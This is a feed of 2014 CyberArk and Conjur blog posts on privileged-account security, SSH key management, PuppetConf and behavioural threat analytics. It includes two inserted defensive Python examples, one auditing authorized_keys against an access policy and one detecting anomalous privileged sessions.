Since the beginning of the month, two high-profile data breaches have been announced: JPMorgan and Yahoo have both announced that their systems were compromised, the former as a result of a systematic escalation of privileges attack (née APT, or advanced persistent threat), and the latter fallout from the ShellShock breach.

What we can see and learn from both is that the areas where security fails continue to break along the traditional lines of visibility, least privilege, and trust. In the case of JPM, there was likely an accrual of security debt from years of application acquisition, point-in-time decisions about who and what could use those software packages, and a lack of comprehensive visibility and control over that wide range of software, services, and the permissions that applied to each. Designing least privilege into modern infrastructure is likely the only thing that could have helped prevent these breaches, and over time we hope to see this become standard practice.

As Ericka Chickowski over at Dark Reading points out, “investigations found that the attackers made their way deep into internal systems, gaining full administrative privileges on more than 90 servers.” In many ways, this reflects the same risk vector we at Conjur often repeat, originally made by Gus Hunt (former director of security at the CIA): you are only as strong as your weakest link.

In this sense, both Yahoo and JPM reveal not only that security is a wide-ranging problem that needs to be addressed across the entire technology stack, but also that we need to define and enforce new best practices as infrastructure is rebuilt and modernized. With respect to the big security vendors, there probably isn’t a commercial solution that would have prevented the kind of breach that JPM experienced — the scope was likely too broad, and the threat surface too wide to manage post-hoc.

The real solution is in solving for security from the ground up. The natural inflection point for this is when new infrastructure is being built: servers moved into AWS or Rackspace or Azure, automation tools like Jenkins (and Puppet, and Chef) spun up, and new virtualization and containerization platforms such as VMWare and Docker engaged. While there are no guarantees in the security arena, there is truth in the idea that good practices beget good practices. If you’re embarking on DevOps and cloud, take the time now to create a robust security stance and ensure that it doesn’t fall prey to the kinds of systemic weaknesses that most organizations have inherited from previous generations of technology and system design.

Keep an eye on this space over the coming months, as we’ll be describing some of these best practices in more detail, and helping design and architect security into Jenkins, Puppet, SaltStack, Docker, VMWare, and more.

Five Key Lessons from PuppetConf 2014 https://www.cyberark.com/blog/five-key-lessons-from-puppetconf-2014/ Mon, 29 Sep 2014 15:59:00 +0000 https://cyberarkvx2.wpengine.com/blog/five-key-lessons-from-puppetconf-2014/  

PuppetConf 2014 is behind us.

Running an event circuit every year can be challenging. On the vendor side of the booth, most exhibit floors look alike; it’s the rare show that is memorable, let alone definitional for an industry sine qua non.

PuppetConf bucks the trend. As a gathering point for the community (many of whom stopped by our booth to chat about topics that ran the gamut from IDM in Red Hat to encryption for GPG keys), the three days we spent in San Francisco were markedly focused on the most exciting themes in our world: automation, continuous integration, and modernization of infrastructure.


In the hallways, ballrooms, and sessions of the Marriott Marquis, we eagerly dove into DevOps for a week, and while we are happy to be home, surfacing to the snap of a New England autumn has left us reflective. In considering our time there, we’ve assembled what we think of as the five essential take-aways from the conference:

1. Old tools are old.

Many of our discussions were driven by the recognition-and-knowing-smile that Active Directory, LDAP, Kerberos, RADIUS, and the like simply don’t scale to the kind of infrastructure that you see being automated and deployed through technologies like Puppet.

2. DevOps is the new home of “shadow IT”.

Simultaneously, the folks we heard from were on the forefront of technological adoption: they are solving real problems, making things work, and are willing to try new tools in order to make their teams more productive. Anything that blocks that initiative is sidestepped for the good of the business.

3. Audit and compliance problems are real.

DevOps, like any technology-centric group, needs to both drive their business forward and be able to prove that they are doing so with respect to their legal and ethical obligations. Handling PCI, PHI, PII, and other sensitive/regulated data imposes specific requirements upon the DevOps team, and demonstrating to auditors that those requirements are being met can be (as always) a headache.

4. Even carpenters hire plumbers.

By definition, DevOps teams are capable builders, with deep skill sets in technology. However, their time is highly valuable, overly taxed, and best spent on solving the problems that nobody else can. Even a casual stroll around the show floor at PuppetConf revealed that there is a robust ecosystem of vendors solving problems that shouldn’t be managed in-house just “because we can”.

5. SecDevOps is real.

The next frontier in the space is going to be the convergence of security and DevOps, what some are calling SecDevOps, by default. The concepts of people-centric security hold true in the DevOps world: your users — developers and IT teams, in this case — will not wait for approval; it behooves the DevOps team to get in front of issues and provide easy, secure, and robust alternatives to insecure behaviors, whether that means a facility for key distribution or a strong set of permissions for service-to-service communications.

What was your experience like? Do you see the SecDevOps frontier as being where you or your team are headed? Are there other lessons you’d focus on?

Let us know!

PuppetConf 2014 – Day One: Hiera-Eyaml, Drones, and More https://www.cyberark.com/blog/puppetconf-2014-day-one-hiera-eyaml-drones-and-more/ Wed, 24 Sep 2014 10:04:00 +0000 https://cyberarkvx2.wpengine.com/blog/puppetconf-2014-day-one-hiera-eyaml-drones-and-more/  

Team Conjur was out in force at PuppetConf 2014 yesterday, with our table set up front and center on the Golden Gate level of the event HQ at the Marriott Marquis. Over the course of the day, we had hundreds of conversations with the community of Puppet users, experts, and integrators, touching on everything from the relative security of hiera-eyaml (a good start, but not as robust as using Conjur to keep secrets out of Puppet manifests and Puppet master servers) to the future of continuous integration and DevOps.


One theme we’ve seen emerge on the show floor is that good infrastructure hygiene is growing in importance as configuration management tools like Puppet are becoming increasingly embedded into the IT and DevOps workflow. Many of the attendees who have come up to chat have said that they either are looking for alternatives to the traditional LDAP/Kerberos/RADIUS toolchain, or that they’ve made an attempt at finding a modern alternative and been unable to do so quickly and easily.

In many ways, this is exactly what Conjur offers: a simple to implement, easy to configure, and widely integrated authorization platform for permissions and secrets management. For the Puppet audience, we released our PuppetForge module yesterday morning to make this even faster!

Check it out, and if you’ve not already done so, register for our Parrot AR Drone raffle — we’ll be pulling the winning ticket at 9am PST!

PuppetConf 2014 – Opening Night https://www.cyberark.com/blog/puppetconf-2014-opening-night/ Tue, 23 Sep 2014 10:09:00 +0000 https://cyberarkvx2.wpengine.com/blog/puppetconf-2014-opening-night/  

Last night, we opened up PuppetConf 2014 at the cocktail reception hour, to a fantastic reception: amidst a dubstep and dance music backing, the Puppet team went out of their way to make everyone feel welcome and comfortable, with a friendly and open bar, servers threading between the crowd with a wide range of hors d’oeuvres, and a lot of deep conversation about what Conjur is and how it works.


We chatted about RADIUS and Kerberos, and their respective role in the modern IT infrastructure (still there, but harder to rely on exclusively), how Netflix used Conjur to avoid implementing a new AD or OpenLDAP system (lots of heads nodding), and how easy it was to get started with Conjur at no cost.

We’re looking forward to many more over the next two days – come say hello! We’re on the Golden Gate Level, just outside of the coat check room, and we’ll be raffling off a video-enabled AR drone, handing out our (we think) cool t-shirts, and going deep on how to monitor, manage, secure, and audit your infrastructure with Conjur.

See you soon at 2014 PuppetConf! https://www.cyberark.com/blog/see-you-soon-at-2014-puppetconf/ Fri, 19 Sep 2014 10:08:00 +0000 https://cyberarkvx2.wpengine.com/blog/see-you-soon-at-2014-puppetconf/  

Conjur is heading to the 2014 PuppetConf!

Our plane tickets are printed, our banner is shipped, but the suitcases are another story…


Either way, Conjur is delighted to be sponsoring and attending the 2014 PuppetConf! We’ll be camping out for the duration of the conference on the Golden Gate level, booth 33; just look for the big Conjur sign!

We have a 2014 Autumn Automation Contest in which we are raffling off a video-enabled Parrot AR Drone Quadricopter to anyone who takes 15 minutes to chat with us about authz, automation, and DevOps! To enter, either fill out our raffle entry form (link below) to schedule a 15 minute chat or pop by our table. The winning ticket will be drawn on Wednesday, September 24th at 9am PST.

We’ll also be handing out our new Conjur t-shirts, so stop by!

Looking forward to seeing you all there!

Key Management in the Cloud – Part 2 https://www.cyberark.com/blog/key-management-in-the-cloud-part-2/ Wed, 17 Sep 2014 10:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/key-management-in-the-cloud-part-2/  

Key Pair Management: Cloud Security

This is the second and final installment of our Key Management in the Cloud blog posts. You can find part one here.

In the first part of this series, we described three concepts of key management:

  • A key pair is composed of a public and a private key.
  • Public keys are not secrets.
  • Selective distribution of public keys conflates authentication and authorization.

Today, let’s examine the flaws of “public key pushing”, and describe a better alternative.

Strike 1: “Public key pushing” allows escalation of privilege.

Once Bob gains root access to a host, he can see all the public keys on that machine. Normally this is not a problem, since public keys are public and not secrets; but here, what happens if Bob finds Alice’s public key on the host (or finds it elsewhere), and starts copying it to other hosts? Bob is using his knowledge of Alice’s public key to escalate her privilege level in the infrastructure. In effect, Bob can grant Alice access to any system that he himself has access to. The “public key pushing” technique is supposed to facilitate centralized management of SSH access, but in fact, the access is managed on each host itself in the authorized_keys file. The host access list can be changed by anyone with root-level access to the host, and the intended authorization policy cannot be guaranteed to be correct. Even if the management server is constantly re-pushing the public key lists out to every host, the key lists are only eventually consistent; as the server keeps wiping Alice’s key out of authorized_keys, Bob can keep putting it back, giving Alice plenty of opportunities to log in.

Strike 2: Removing a user’s public key removes their ability to be identified.


It’s important to be able to audit the succeeded and failed login attempts to all your hosts. What happens when Alice tries to SSH to a host which hasn’t been “pushed” her public key? The host is unable to verify Alice’s identity. In effect, it looks like a non-Alice person has tried to authenticate as Alice, but that is not what happened at all! Alice is still Alice, but she doesn’t have access. These are two very different things. A failed authentication attempt means “someone you don’t know tried to claim to be someone you know”. A failed authorization attempt means “someone you know tried to access a system she doesn’t have access to”. From a security standpoint, these are quite different; but a “public key pushing” system can’t tell the difference.

Strike 3: Key-pushing scripts are fragile and easy to break.

Key-pushing scripts are typically stored in a configuration management system, along with scripts that serve many other purposes. Ideally, all these scripts function independently and reliably, but in practice, it’s easy to make an “unrelated” change to script A which breaks script B. During the time it takes to get everything working again, the (already weak) capabilities of the key-pushing system are seriously compromised.

At this point it should be clear that public keys are not secrets and shouldn’t be treated as such. So what is the right way to manage access to hosts?

SSH does have a proper mechanism for authorization: once authenticated, a user can be checked against an access list (e.g. via LDAP search). If the user isn’t authorized, they can’t login. The system doesn’t deny their identity, but it does deny their access. The proper outcome is effected (Alice can’t login), and the proper event is recorded (Alice was authenticated, but not authorized).

Now let’s turn our attention to the private key. Just as public keys should not be treated as secrets, there is an argument that private keys shouldn’t be treated as ordinary, shareable secrets either. It’s not uncommon to see private keys loaded into secrets storage (version control, configuration management, etc.), or even shared by email. What’s the problem with this? In effect, private keys are intended to be so secret that they are not shared with anyone. Sharing a private key is akin to sharing a password; it’s a security and compliance no-no. When you choose a password for a web application, the web app doesn’t actually store your password; it salts and hashes your password in a non-recoverable way, which is sufficient to verify your identity in the future, but it’s not possible to recover the password itself from its salted hash. Similarly, you should never provide a private key to any system or any other person. The public key is specifically designed to be safely sharable. If you need to authenticate yourself to another person or system, they don’t need to know your private key for that; just your public key.
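As an added example (not Conjur’s or CyberArk’s code), the following Python script audits a host’s authorized_keys file against a central identity directory and per-host access list, reporting keys that someone with root could have added outside policy (Strike 1), and shows the authenticate-then-authorize decision whose audit record tells an unknown identity apart from a known person without access (Strike 2). The host name, users, policy and key blobs are constructed for the example.

```python
"""Audit a host's authorized_keys against a central identity directory and
access policy, and record authentication and authorization failures separately.

Added example, not Conjur's or CyberArk's code. The host name, users, policy
and key blobs below are constructed for illustration.
"""
import base64
import hashlib
import shlex
import struct

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-sha2-", "sk-ssh-", "sk-ecdsa-")


def fingerprint(b64_blob):
    """OpenSSH-style SHA256 fingerprint of a base64-encoded public key blob."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Return (options, keytype, fingerprint, comment) tuples for each key line.

    Follows the real file layout: optional leading options (possibly with
    quoted spaces, e.g. command="..."), then key type, base64 blob, comment.
    """
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)
        idx = next((i for i, t in enumerate(tokens)
                    if t.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(tokens):
            continue  # malformed line: no key type / blob
        options = " ".join(tokens[:idx])
        keytype, blob = tokens[idx], tokens[idx + 1]
        comment = " ".join(tokens[idx + 2:])
        entries.append((options, keytype, fingerprint(blob), comment))
    return entries


def constructed_blob(label):
    """A syntactically valid ssh-ed25519 public key blob (OpenSSH wire format:
    length-prefixed type string, then 32 key bytes). The key bytes are derived
    from a label so the example runs offline; this is NOT real key material."""
    key = hashlib.sha256(label.encode()).digest()
    raw = b"".join(struct.pack(">I", len(p)) + p for p in (b"ssh-ed25519", key))
    return base64.b64encode(raw).decode()


ALICE, BOB, CAROL = (constructed_blob(n) for n in ("alice", "bob", "carol"))

# Central identity directory: public key fingerprint -> person. Public keys are
# not secrets, so every known identity can be listed for every host.
DIRECTORY = {fingerprint(ALICE): "alice", fingerprint(BOB): "bob"}

# Central access policy: host -> people authorized to log in there.
POLICY = {"web01": {"bob"}, "db01": {"alice", "bob"}}

# Constructed authorized_keys as found on web01 after someone with root added
# Alice's key and a key that is not registered in the directory at all.
WEB01_AUTHORIZED_KEYS = f"""\
# managed by the key-pushing script
ssh-ed25519 {BOB} bob@ops
from="10.1.0.0/16",no-agent-forwarding ssh-ed25519 {ALICE} alice@laptop
ssh-ed25519 {CAROL} unknown@somewhere
"""


def audit_host(host, authorized_keys_text, directory=DIRECTORY, policy=POLICY):
    """Report keys present on the host that the central policy does not grant."""
    findings = []
    granted = policy.get(host, set())
    for _opts, _ktype, fp, comment in parse_authorized_keys(authorized_keys_text):
        user = directory.get(fp)
        if user is None:
            findings.append({"user": None, "comment": comment, "issue": "unknown-identity"})
        elif user not in granted:
            findings.append({"user": user, "comment": comment, "issue": "not-authorized"})
    return findings


def decide_login(host, presented_fp, directory=DIRECTORY, policy=POLICY):
    """Authenticate against the directory first, then authorize against the
    access list, so the audit trail can tell the two failures apart."""
    user = directory.get(presented_fp)
    if user is None:
        return "denied:unknown-identity"   # someone unknown claimed an identity
    if user not in policy.get(host, set()):
        return "denied:not-authorized"     # known person, no access to this host
    return "allowed"


if __name__ == "__main__":
    for finding in audit_host("web01", WEB01_AUTHORIZED_KEYS):
        print("web01 drift:", finding)
    for name, blob in (("alice", ALICE), ("bob", BOB), ("carol", CAROL)):
        print(name, "->", decide_login("web01", fingerprint(blob)))
```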

Key Management In The Cloud – Part 1 https://www.cyberark.com/blog/key-management-in-the-cloud-part-1/ Tue, 16 Sep 2014 10:06:00 +0000 https://cyberarkvx2.wpengine.com/blog/key-management-in-the-cloud-part-1/  

Cloud Key Management: Pairs, Security, and Authz

Key management is a frequent topic when discussing security, compliance, and the cloud in the DevOps and IT communities. Obviously, keys are used in a number of different ways, and have a wide range of different definitions that are technology bound. One area of focus in particular has implications for cloud security, often overlooked: key pair relationships.

As a recap, key pairs consist of a private key, which is kept secret by the owner, and a public key, which is associated with the owner and freely distributed. (Public and private keys are simply strings of very large numbers which have no discernible relationship to each other; knowing the public key doesn’t help you determine the private key, and vice versa.)

Key pairs are often used for things like:

  • Encryption: a message is encrypted with the public key and it can be decrypted only with the private key
  • Digital Signatures: a message is signed with the private key and its authenticity can then be verified with the public key

In particular, consider how key pairs relate to SSH authentication; the scenario proceeds something like this:

  • Alice opens an SSH connection to a host
  • The host challenges Alice to present a signed message (see digital signature above)
  • Alice signs a message with her private key and sends it to the host
  • The host uses Alice’s public key to verify the message signature

If the signed message is authentic, the remote user is Alice. Otherwise the remote user is not authentic, and the connection is terminated.


The public key, therefore, is not a secret; its purpose is to be the known counterpart to a private key. And yet, it is a common pattern in SSH management scripts (especially those used in configuration management tools such as Chef, Puppet, Salt, and Ansible) to misuse public keys by selectively distributing them to different machines. If public keys are not secrets, why are they being guarded in this manner?

The answer is that authentication is being conflated with authorization. Authentication is used to establish identity. Alice is Alice, and everyone else is not. Authorization is used to determine access levels and permissions. Once Alice is authenticated, then she is either granted or denied access based on permissions rules.

By trying to control which public keys are on each host, the SSH “public key pushing” technique described above creates a conflation of authentication and authorization. Selective public key pushing is intended to work like this: when Bob’s public key is pushed onto a host, then the host can authenticate Bob and he logs in. If Bob’s public key is removed, he can’t log in any more. But…Bob is Bob. Removing his public key doesn’t make him not-Bob.

You may not realize it, but this authorization anti-pattern practice can lead to a number of practical security problems.

In part 2 of this blog series, we will look more at the operational and security flaws associated with this practice, and how Conjur can provide a strong, secure, auditable alternative.

Analyze This: How IP Addresses Can Save the Day https://www.cyberark.com/blog/analyze-ip-addresses-can-save-day/ Mon, 15 Sep 2014 14:21:33 +0000 https://www.cyberark.com/blog//

By CyberArk Labs

Everyone in the security business is talking about analytics – threat intelligence, big data, mining, etc. Clearly, sifting through huge amounts of data has significant value for understanding the complex nature of IT infrastructure and advanced cyber threats. However, a serious challenge presents itself around what data is important and what should move to the top of the pile. As our recent 2014 Global Advanced Threat Landscape survey showed, Snowden and retail/POS breaches influence security strategies the most, and the common factor in these attacks is the exploitation of privileged accounts.

Focusing on pinpointing malicious privileged account activity should be at the top of the list, given the significance of these credentials in every advanced attack. The challenge is how to do this in real-time to stop an in-progress attack. A behavior-based approach makes this much easier. For example, let’s take a look at privileged account activity correlated with IP address location.

It’s been well established that attackers seek out privileged credentials as a means to move throughout a network – either hopping from user to machine credentials or escalating to more powerful ones. While the attacker may blend into the normal workflows related to a set of hijacked accounts, the IP address they connect from can be a giant red flag. Normal day-to-day running of a company may require a sysadmin to access servers and databases quite often throughout the day. IP location tells us if that sysadmin is working from his normal office or somehow logged in from Russia …

Similarly, every network has normal connectivity behavior that, once modeled, can be used to detect an attack. For example, patterns will develop that show certain privileged accounts are used to connect from a particular computer or workstation, to a server, and never are those credentials used from a different device. IP location will tell you if that changes, indicating a possible attack. This is what happened in the 2012 RSA attack and was one of the indicators that something was wrong.

Another way to look at correlation is segmentation and IP address changes. It’s common to have a range of IP addresses accessing a set of servers, with one or two being dedicated to access only one server. If, suddenly this IP address connects to all servers, there might be something wrong.

The beauty of taking a behavior-based approach to identifying in-progress attacks is that once you layer models on top of each other, you create many baselines and compound dependencies that become nearly impossible to game. Check out our approach here.

Effective Behavior-based Defense https://www.cyberark.com/blog/effective-behavior-based-defense/ Thu, 11 Sep 2014 16:03:48 +0000 https://www.cyberark.com/blog//

By CyberArk Labs

Analytics are a tricky business, no matter what purpose they’re applied to, let alone for use to stop a cyber-attack in progress. Take behavioral analytics, for example. What’s simply odd and what’s a threat? And if you’re creating security profiles based on behavior, can’t the bad guys simply game the models you’re monitoring for?

First, let’s tackle what distinguishes a behavioral threat. The Night Dragon attacks were coordinated, covert and targeted cyber-attacks conducted in 2009 against global oil, energy, and petrochemical companies. Once the bad guys infiltrated the network of target companies, they went about their business, extracting information. When investigated, it appeared the malicious network traffic occurred on weekdays from 9:00 a.m. to 5:00 p.m. Beijing-time, well outside the normal working hours of these companies. And based on the volume of traffic it was highly likely to be more than simply a late night for the IT department. Clearly this was much more than ‘odd’ network access behavior.

The recently reported Energetic Bear attack on similar energy sector companies around the world in 2011 took this a step further (see our earlier post for details). In this attack, forensics found the timing data related to malware build hours, and command and control monitoring activity was consistently between 8:00 a.m. to 6:00 p.m. Moscow-time. Again, repeated activity outside of a company’s normal working patterns was indicative of an attack.

It hasn’t taken long for the bad guys to figure out that ‘active hours’ are being monitored as a general course of defense. Such an example is the 2013 cyber-attack against retail PoS installations. In one high-profile attack, the bad guys designed malware to only exfiltrate data between 10:00 a.m. and 6:00 p.m. local time, so as to disguise themselves in regular working-hours traffic.

It would seem that yes, the bad guys can game this defense quite easily once they know what activity is being monitored. However, the beauty of behavioral analytics is that it is nearly impossible to game the system once you layer models on top of each other, creating many baselines and compound dependencies within those individual models. And since behavioral analytics are based on actual usage data rather than on list-based rule-sets, the number and character of the models that become a baseline alerting structure are virtually limitless.
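As an added example (not CyberArk’s code) covering both the IP-address correlation in the previous post and the layered models described here, the following Python builds three independent baselines from privileged-session log lines (source IP per account, active hours per account, and targets reached per source IP) and scores a monitoring window against all of them at once. The log format, sample values and fan-out threshold are assumptions constructed for the example.

```python
"""Layered behavioural baselines over privileged-account session logs.

Added example, not CyberArk's code. The log format, sample values and the
fan-out threshold below are constructed assumptions for illustration.
"""
from collections import defaultdict
from datetime import datetime

# Constructed training-period records (the "normal" picture the models learn):
# sysadmin works office hours from one workstation against the web tier,
# dbadmin from one jump host against db01 only.
BASELINE_LOG = """\
2014-09-01T09:12:41 acct=sysadmin src=10.1.4.22 dst=web01
2014-09-01T11:40:03 acct=sysadmin src=10.1.4.22 dst=web02
2014-09-02T14:05:19 acct=sysadmin src=10.1.4.22 dst=web01
2014-09-02T16:58:00 acct=sysadmin src=10.1.4.22 dst=web02
2014-09-01T09:30:12 acct=dbadmin src=10.1.4.30 dst=db01
2014-09-02T16:02:55 acct=dbadmin src=10.1.4.30 dst=db01
"""

# Constructed records from the monitoring window that gets scored.
NEW_LOG = """\
2014-09-10T10:02:11 acct=sysadmin src=10.1.4.22 dst=web01
2014-09-10T03:14:09 acct=sysadmin src=203.0.113.7 dst=web02
2014-09-10T15:20:00 acct=dbadmin src=10.1.4.30 dst=db01
2014-09-10T15:21:30 acct=dbadmin src=10.1.4.30 dst=web01
2014-09-10T15:22:45 acct=dbadmin src=10.1.4.30 dst=web02
2014-09-10T15:23:10 acct=dbadmin src=10.1.4.30 dst=app01
"""


def parse_log(text):
    """Turn 'timestamp key=value ...' lines into dicts with a datetime 'ts'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        ev = dict(f.split("=", 1) for f in fields)
        ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")
        events.append(ev)
    return events


def build_baseline(events):
    """Three independent models learned from the training period."""
    base = {
        "acct_sources": defaultdict(set),  # source IPs each account uses
        "acct_hours": defaultdict(set),    # hours of day each account is active
        "src_targets": defaultdict(set),   # servers each source IP reaches
    }
    for ev in events:
        base["acct_sources"][ev["acct"]].add(ev["src"])
        base["acct_hours"][ev["acct"]].add(ev["ts"].hour)
        base["src_targets"][ev["src"]].add(ev["dst"])
    return base


def detect(base, events, fanout_threshold=3):
    """Score each event against every model; return (event, reasons) pairs.

    An event is reported when at least one model fires; the reasons list shows
    how many independent baselines it violated, which is what makes the
    layered approach hard to game by blending into a single pattern.
    """
    # Fan-out is a property of the window, not of one event: count the distinct
    # targets each source IP reaches across the batch being scored.
    window_targets = defaultdict(set)
    for ev in events:
        window_targets[ev["src"]].add(ev["dst"])

    findings = []
    for ev in events:
        reasons = []
        acct, src = ev["acct"], ev["src"]
        if src not in base["acct_sources"][acct]:
            reasons.append("new-source-for-account")
        hours = base["acct_hours"][acct]
        if hours and not (min(hours) <= ev["ts"].hour <= max(hours)):
            reasons.append("outside-active-hours")
        known = len(base["src_targets"][src])
        seen_now = len(window_targets[src])
        if seen_now >= fanout_threshold and seen_now > known:
            reasons.append("source-fanout:%d-targets" % seen_now)
        if reasons:
            findings.append((ev, reasons))
    return findings


def run():
    """Train on BASELINE_LOG and score NEW_LOG."""
    base = build_baseline(parse_log(BASELINE_LOG))
    return detect(base, parse_log(NEW_LOG))


if __name__ == "__main__":
    for ev, reasons in run():
        print(ev["ts"], ev["acct"], ev["src"], "->", ev["dst"], reasons)
```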

Tuesday, we unveiled CyberArk Privileged Threat Analytics 2.0 – a behavior-based analytics solution designed to help organizations to rapidly identify and respond to in-progress attacks.  Click here for more information. You can also watch a video introduction to CyberArk Privileged Threat Analytics.

Powering Up Threat Detection with Privileged Threat Analytics https://www.cyberark.com/blog/powering-threat-detection-privileged-threat-analytics/ Tue, 09 Sep 2014 14:19:45 +0000 https://www.cyberark.com/blog//

By John Worrall

One of the most common and disturbing aspects of the data breaches and cyber-attacks we see on a weekly basis is that attackers typically are on the target company’s network for weeks, months and even years at a time without being detected. According to Mandiant, the median length of time that attackers are on an organization’s network before being detected is approximately 240 days.

Analytics were supposed to be one of the cures for this problem, however, security teams are being overwhelmed by big data, compromising a team’s ability to respond to alerts.

This is why CyberArk today unveiled Privileged Threat Analytics 2.0 – designed to help businesses cut through the clutter to rapidly identify and respond to in-progress attacks.  CyberArk does this by focusing on the data sets that matter most when it comes to identifying potential threats: privileged account activity.

As we’ve discussed in the past, the exploitation of privileged accounts is a critical component of all advanced attacks, primarily because of the power it yields to an attacker. Once an attacker makes it inside the perimeter, hijacked privileged credentials enable the attacker to hide in plain sight and move freely on the network, basically turning a company’s infrastructure against itself.

CyberArk Privileged Threat Analytics collects and analyzes privileged account activity, empowering businesses to immediately detect malicious privileged behavior and help shut down the most common avenue for attackers to move laterally on a company’s network.

Key to the new version are two-way, out-of-the-box integrations with leading SIEM vendors like HP ArcSight and Splunk Enterprise. We pull contextual data from what the SIEM solutions collect and layer it on top of the information our solution monitors, enabling customers to pinpoint privilege-based threats that can be hidden in the vast troves of information collected by the SIEM systems.

Time and again, it’s been demonstrated that privileged accounts are the key to mitigating advanced attacks. Whether it’s the recent spate of retail/PoS attacks, the continued attacks on critical infrastructure, or attacks on financial and healthcare organizations through default passwords, the common denominator is that the exploitation of privileged accounts is at the heart of every cyber incident.

If attackers are relying on your privileged accounts to perpetrate their attacks, shouldn’t the activity on these accounts be the first thing you monitor? Don’t just rely on data – rely on the data that matters.

For more information, please visit https://www.cyberark.com/products/privileged-account-security-solution/privileged-threat-analytics/.

To view a video introduction to CyberArk Privileged Threat Analytics, please visit: https://cyberark.wistia.com/medias/f8nqebyjy1.

]]>
Release of Conjur 4.3 Beta https://www.cyberark.com/blog/release-of-conjur-4-3-beta/ Mon, 08 Sep 2014 11:11:00 +0000 https://cyberarkvx2.wpengine.com/blog/release-of-conjur-4-3-beta/  

Chef and Docker Security Improvements!

We are extremely excited to announce Conjur 4.3, our new beta release, with enhanced Chef and Docker security support!

The development team has been working around the clock on a number of new features, enhancements, and fixes to the already robust Conjur platform, and as of today, we are making it available for our customers upon request (to request access, just drop us a note at support@conjur.net).

Not only have we built out Conjur features, but we have also created some fantastic new integrations with some of your (and our) favorite software packages: Chef and Docker!

For the full scoop, click here to download our Release Notes document, which covers all the new features of Conjur 4.3!

]]>
Fighting Back Against Targeted Attacks https://www.cyberark.com/blog/fighting-back-targeted-attacks/ Fri, 05 Sep 2014 17:42:33 +0000 https://www.cyberark.com/blog//

By John Worrall

Energy and oil companies in Norway have been facing what local security authorities are calling, “the biggest targeted cyber-attack ever on local companies.”

These attacks are very similar to multiple attacks on critical infrastructure companies here in the U.S. and around the world. While we’ve become conditioned to expect news on attacks of this nature, the latest were followed with a surprising report: how one company was able to get ahead of the bad guys to mitigate their attack before damage was done.

The report on how Statoil continues to defend itself is revealing for critical infrastructure companies facing similar attacks.

Statoil provided some great insight into the attack methods used against it, including:

Attackers used watering hole tactics to gain access to employee credentials. This is a common tactic. In the case of Statoil, attackers targeted a well-known international company that gathers data for the oil industry. By targeting and infecting this site, the attackers were able to identify and steal credentials from more than 40 Statoil employees – giving them the foothold they needed into the business.

Attackers elevated privileges on stolen credentials to gain additional information and access. This is the most common step in a targeted attack – gaining valid employee credentials and exploiting their privileges to gain broad access to the target network. This is the pathway we’ve seen used in almost every single advanced attack – from the recent spate of retail/PoS attacks, to the continued attacks on critical infrastructure. These two steps alone can give attackers broad access to the network they’re targeting, and are critical in advancing their attacks. This is also where Statoil was able to make its stand.

Because the company understands the power of privileged accounts, and the vulnerabilities they represent, they were able to incorporate the management of these accounts into their broader defense in depth strategy.

From the reports, Statoil’s team was first alerted to the breach when its intrusion detection system discovered that malicious code was being downloaded to an employee machine. The code tried to establish communications with blacklisted areas of the network that are not normally used or accessed for normal business.

By following the privileged account activity, Statoil was able to backtrack, identify the infected machines that precipitated the attack, remove them from the network and make sure the stolen employee credentials were updated and secured. It will be interesting to see the additional details emerge, but by sharing the information released so far, Statoil provides a valuable lesson for other companies. It is another example of why privileged account security is essential to any organization’s defenses.

]]>
Conjur Featured on Devops.com https://www.cyberark.com/blog/conjur-featured-on-devops-com/ Thu, 04 Sep 2014 11:44:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-featured-on-devops-com/  

Cloud Authorization with Conjur

Conjur was made for DevOps; so much so that we’ve been featured in an article on DevOps.com! Tony Bradley, founder of Bradley Strategy Group and well-known technical authority, spoke with Kevin O’Brien, founding member at Conjur, about how Conjur works in the DevOps sphere.

Moving into the cloud can be complicated, with technological issues that cross the authorization management and authentication spaces. Conjur can help solve these problems with its API-backed virtual appliance, built in the cloud, for the cloud. Conjur helps businesses with their cloud authorization, secret, and key management, including authorization of all users (human and machine alike), and replaces legacy tools unfit for the cloud, all while helping DevOps teams automate their infrastructure.

Read on to learn what Tony and Kevin had to say about Conjur!

]]>
Meet Us at PuppetConf, Win a Drone! https://www.cyberark.com/blog/meet-us-at-puppetconf-win-a-drone/ Wed, 03 Sep 2014 11:48:00 +0000 https://cyberarkvx2.wpengine.com/blog/meet-us-at-puppetconf-win-a-drone/  

PuppetConf 2014 and Conjur

Are you heading to PuppetConf 2014? Conjur will be there — booth 33, Golden Gate Level — and we’re very excited!

With only a couple weeks to go, we are also announcing our 2014 Autumn Automation Contest. We’re raffling off a video-enabled Parrot AR Drone Quadricopter to anyone who takes 15 minutes to chat with us about authz, cloud infrastructure, and DevOps security between now and Wednesday, September 24, at 9am PDT, either via phone call or at the event.

To enter, all you need to do is to fill out our sign-up form (link below). We’ll set up a time to talk about access intelligence, SSH management, controlling your cloud infrastructure, and anything else of interest to you.

For anyone we meet up with at PuppetConf, we’ll also give you one of our new t-shirts. They’re pretty funny. You’ll like them.

]]>
Keys to the IT Kingdom: Credentials and Lateral Movement https://www.cyberark.com/blog/keys-kingdom-credentials-lateral-movement/ Thu, 28 Aug 2014 17:49:28 +0000 https://www.cyberark.com/blog//

We have a saying at CyberArk, “privilege first,” and it refers to security strategy. Nearly every advanced attack relies on privilege escalation to carry out the breach. Don’t believe me? Here’s a quick reference: the Backoff-based retail breaches, the UPS Store PoS breach, the Energetic Bear hacker activity, and there are many others. In each of these, the attackers went after the ‘keys to the IT kingdom,’ privileged credentials. With these, they were able to move freely across the breached network. So why is lateral movement so closely linked to privileged credentials?

Prominent lateral movement techniques depend on credentials stolen from the attacked network or individual. The Red October hacker activity, for example, saw attackers compile a list of all credentials from every available location on the network in order to navigate the IT environment undetected from 2007 to 2013. If malicious activity raised suspicion on one set of credentials, the attacker simply switched to another set and moved to another area of the network.

